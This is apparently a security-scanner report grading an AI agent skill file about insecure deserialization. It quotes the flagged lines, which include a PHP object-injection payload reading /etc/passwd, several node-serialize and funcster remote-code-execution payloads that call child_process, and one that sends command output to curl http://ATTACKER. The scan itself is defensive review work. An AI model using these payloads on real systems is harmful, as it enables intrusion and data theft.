deserialization-insecure

https://raw.githubusercontent.com/yaklang/hack-skills/main/skills/deserialization-insecure/SKILL.md

github.com/yaklang/hack-skills

Scanned Thu, 28 May 2026 17:27:02 GMT

Scan ID crawl-onhyumwutz5pdnwcgqnz2xmk · 3ms

SCORE 55 / 100

Verdict: Proceed with caution

1 high-severity finding.

This skill reads protected filesystem locations plus 9 other issues listed below.

0 critical1 high9 medium2 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 9 medium findings (6+ MEDs → C).

0 CRIT1 HIGH9 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 4 of 9 MED (cap is 5).
A
Reach Atarget score 95
Resolve all 1 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 181CWE-552

▾

179

180```text

181action=test&configuration=O:10:"PMA_Config":1:{s:6:"source";s:11:"/etc/passwd";}← sensitive path — credential-exfiltration vector

182```

183

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 93CWE-78

▾

91The vulnerability exists when `org.apache.commons.collections` (3.x) is on the classpath and the application calls `readObject()` on untrusted data.

93Key classes in the chain: `InvokerTransformer` → `ChainedTransformer` → `TransformedMap` → triggers `Runtime.exec()` during deserialization.← spawns a subprocess outside declared capabilities

95### Apache Shiro — rememberMe Deserialization

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 413CWE-78

▾

411

412 ```json

413 {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('COMMAND')}()"}← spawns a subprocess outside declared capabilities

414 ```

415

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 419CWE-78

▾

417

418 ```json

419 {"__js_function":"function(){return global.process.mainModule.require('child_process').execSync('id').toString()}"}← spawns a subprocess outside declared capabilities

420 ```

421

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 558CWE-78

▾

556// Payload uses _$$ND_FUNC$$_ marker + IIFE:

557

558var payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'id\',function(error,stdout,stderr){console.log(stdout)});}()"}';← spawns a subprocess outside declared capabilities

559

560// The trailing () makes it an Immediately Invoked Function Expression

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 564CWE-78

▾

562

563// Full HTTP exploit (in cookie or body):

564{"username":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://ATTACKER/?x=$(id|base64)',function(e,o,s){});}()","email":"test@test.com"}← spawns a subprocess outside declared capabilities

565```

566

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 570CWE-78

▾

568```javascript

569// funcster deserializes functions via constructor.constructor pattern:

570{"__js_function":"function(){var net=this.constructor.constructor('return require')()('child_process');return net.execSync('id').toString();}"}← spawns a subprocess outside declared capabilities

571```

572

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 702CWE-78

▾

700// Payload: IIFE (Immediately Invoked Function Expression)

701// The _$$ND_FUNC$$_ prefix signals a serialized function

702{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('id',function(error,stdout,stderr){console.log(stdout)})}()"}← spawns a subprocess outside declared capabilities

703

704// Key: the () at the end causes immediate execution upon deserialization

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 711CWE-78

▾

709// Vulnerable: funcster.deepDeserialize(userInput)

710// Payload uses __js_function to inject via constructor chain:

711{"__js_function":"function(){var net=this.constructor.constructor('return this')().process.mainModule.require('child_process');return net.execSync('id').toString()}()"}← spawns a subprocess outside declared capabilities

712```

713

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

Scan another →Share

skillox.io/r/crawl-onhyumwutz5pdnwcgqnz2xmk